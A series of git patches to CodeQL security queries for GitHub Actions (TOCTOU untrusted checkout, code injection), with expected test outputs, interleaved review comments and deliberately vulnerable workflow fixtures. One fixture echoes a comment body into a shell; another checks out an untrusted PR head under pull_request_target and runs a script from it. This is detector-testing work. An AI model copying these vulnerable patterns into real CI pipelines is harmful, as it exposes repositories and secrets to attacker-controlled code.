.github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | 
@@ -183,8 +183,6 @@ nodes | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -206,7 +204,7 @@ nodes | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | semmle.label | github.event['comment']['body'] | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | 
@@ -254,7 +252,6 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | -| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | 
@@ -262,4 +259,3 @@ subpaths | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | -| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 4b2704043737..ab0a69a8fa8b 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -50,7 +50,7 @@ edges | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | 
@@ -183,8 +183,6 @@ nodes | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -206,7 +204,7 @@ nodes | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | semmle.label | github.event['comment']['body'] | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | 
@@ -254,7 +252,6 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | -| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | 
@@ -312,8 +309,6 @@ subpaths | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | 
@@ -332,8 +327,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/action1/action.yml b/ql/test/query-tests/Security/CWE-094/action1/action.yml deleted file mode 100644 index 8bfa15b405c5..000000000000 --- a/ql/test/query-tests/Security/CWE-094/action1/action.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: 'test' -description: 'test' -branding: - icon: 'test' - color: 'test' -inputs: - test: - description: test - required: false - default: 'test' -runs: - using: "composite" - steps: - - run: echo '${{ github.event.comment.body }}' From e28ad1d644e50148ec8efb43e85519658b9d88ec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 10:28:24 +0200 Subject: [PATCH 294/707] Reduce FP for actor/association checks that cannot be bypassed this way --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 2 +- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index c5e12c0fccc1..a3fcc9e0403d 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b74c3389f9d9..562fc0809b7a 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and From 558bea84d435f7b0cd10a775c6eb65478e5bec63 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Thu, 16 May 2024 10:56:01 +0200 Subject: [PATCH 295/707] Create label_actor.yml --- .../CWE-367/.github/workflows/label_actor.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml new file mode 100644 index 000000000000..1debaecf97d3 --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml @@ -0,0 +1,17 @@ +# Making Label gates the only ones bypassable with TOCTOU races since actor or association ones should not be bypassable +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh From 612be64ffcaa276f659bc1a4d98005d90a3e19f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 16:10:26 +0200 Subject: [PATCH 296/707] Consider actor and association checks as bypassable checks ONLY for issueOps --- .../CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 10 ++++++++-- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 10 ++++++++-- 2 files changed, 16 insertions(+), 4 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index a3fcc9e0403d..b7b8a3cf9564 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql 
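Review bot: The fixture never states the outcome it is meant to assert — the diffstat shows only this file added and no `.expected` change, and the header comment describes the design rationale rather than the expected query result. Since the gate on the `if:` line is an owner/actor check (`github.repository_owner == 'npm' && github.actor == 'dependabot[bot]'`) and not a label check, I read it as a negative test for the TOCTOU queries; saying so keeps the fixture self-explanatory, e.g. `# Negative test: owner/actor gate on a pull_request_target labeled event — UntrustedCheckoutTOCTOU* must NOT report the mutable head.ref checkout below`. It is also worth one clause noting that on a `labeled` activity `github.actor` is, as I understand it, the user who applied the label rather than the PR author, so a reader knows which identity the gate is vetting.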
@@ -15,11 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution - checkout.getAFollowingStep() instanceof PoisonableStep + checkout.getAFollowingStep() instanceof PoisonableStep and + ( + check instanceof LabelControlCheck + or + (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") + ) select checkout, "The checked-out code can be changed after the authorization check o step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 562fc0809b7a..658879222315 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
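Review bot: In QL's `matches`, `_` is a single-character wildcard, so `matches("%_comment")` means "anything, one arbitrary character, `comment`" — it accepts the intended `issue_comment`, `pull_request_review_comment` and `discussion_comment`, but equally `commit_comment` and any future event ending that way, which is broader than the "IssueOps only" intent in the commit message. Listing the triggers explicitly also documents the heuristic: `check.getEnclosingJob().getATriggerEvent().getName() = ["issue_comment", "pull_request_review_comment", "discussion_comment"]` (or escape the underscore as `"%\\_comment"` if the wildcard form is preferred). Separately, the `select` message on the context line reads "authorization check o step", which looks like a dropped "f".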
@@ -15,11 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution - not checkout.getAFollowingStep() instanceof PoisonableStep + not checkout.getAFollowingStep() instanceof PoisonableStep and + ( + check instanceof LabelControlCheck + or + (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") + ) select checkout, "The checked-out code can be changed after the authorization check o step $@.", check, check.toString() From dfeefe0caabc46a1676b042b9ea189fc8892e4c2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 16:17:26 +0200 Subject: [PATCH 297/707] Consider actor and association checks as bypassable checks ONLY for issueOps --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 4 +++- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 4 +++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 5d501f2cea9a..6b3e0628f40b 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql 
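Review bot: The new five-line disjunction (label check, or actor/association check on a comment-triggered job) is now pasted verbatim into both `UntrustedCheckoutTOCTOUHigh.ql` and `UntrustedCheckoutTOCTOUCritical.ql`, so the bypassability heuristic has two definitions that will drift. Both queries already import `codeql.actions.security.UntrustedCheckoutQuery`; a single `predicate isBypassableAccessCheck(ControlCheck check)` there, called as `isBypassableAccessCheck(check) and` in each `where`, keeps one source of truth and lets the IssueOps rationale be documented once.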
@@ -15,15 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() instanceof PoisonableStep and ( + // label gates do not depend on the triggering event check instanceof LabelControlCheck or + // actor or Association gates apply to IssueOps only (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index e2f2b26a75ca..fcf832699603 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -15,15 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution not checkout.getAFollowingStep() instanceof PoisonableStep and ( + // label gates do not depend on the triggering event check instanceof LabelControlCheck or + // actor or Association gates apply to IssueOps only (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) 
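Review bot: The comment `// actor or Association gates apply to IssueOps only` says something different from what the code checks — actor/association gates appear on any trigger; what the predicate encodes is that they are only *bypassable* on comment-triggered jobs. As I understand the rationale behind this query, the comment should state it: `// actor/association gates are only bypassable via TOCTOU in IssueOps (comment-triggered) jobs: the comment author is vetted, but the PR head checked out afterwards can be changed by someone else`. The same wording applies to the identical comment in the Critical query.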
From 47a66e10756f0d9ba4c9860b8c6e769c59baeed3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 21:43:00 +0200 Subject: [PATCH 298/707] Add TODO --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5e4f078bc3ac..0370b1ca4c3f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1290,6 +1290,8 @@ class MatrixAccessPathImpl extends TMatrixAccessPathNode { } private YamlMappingLikeNode resolveMatrixAccessPath( + // TODO: support `include` and `exclude` keys + // https://docs.github.com/en/actions/using-jobs/using-a-matrix-for-your-jobs#expanding-or-adding-matrix-configurations YamlMappingLikeNode root, MatrixAccessPathImpl accessPath ) { // access path contains no dots. eg: "os" From 5f8bab0608a9d2a3f460847e35cf2f45b920b868 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 17 May 2024 22:36:26 +0200 Subject: [PATCH 299/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 7413744d3ff1..b1a100a7040e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.25 +version: 0.0.26 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6bb27759f068..341b6f45c298 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.25 +version: 0.0.26 groups: - actions - queries From d3bff87f9accf334041cb821c21ad4a60fd29288 Mon Sep 17 00:00:00 2001 
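Review bot: The two `// TODO` lines are inserted between the opening parenthesis of `resolveMatrixAccessPath(` and its parameter list, which parses but is an unusual place for a contract note — a reader looking for what the predicate does or does not support will look above the declaration. Move them immediately before `private YamlMappingLikeNode resolveMatrixAccessPath(`, ideally as a QLDoc block (`/** Resolves ... TODO: `include`/`exclude` matrix keys are not yet handled (see docs link). */`), so the limitation shows up in hover documentation. The predicate body continues outside the hunk.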
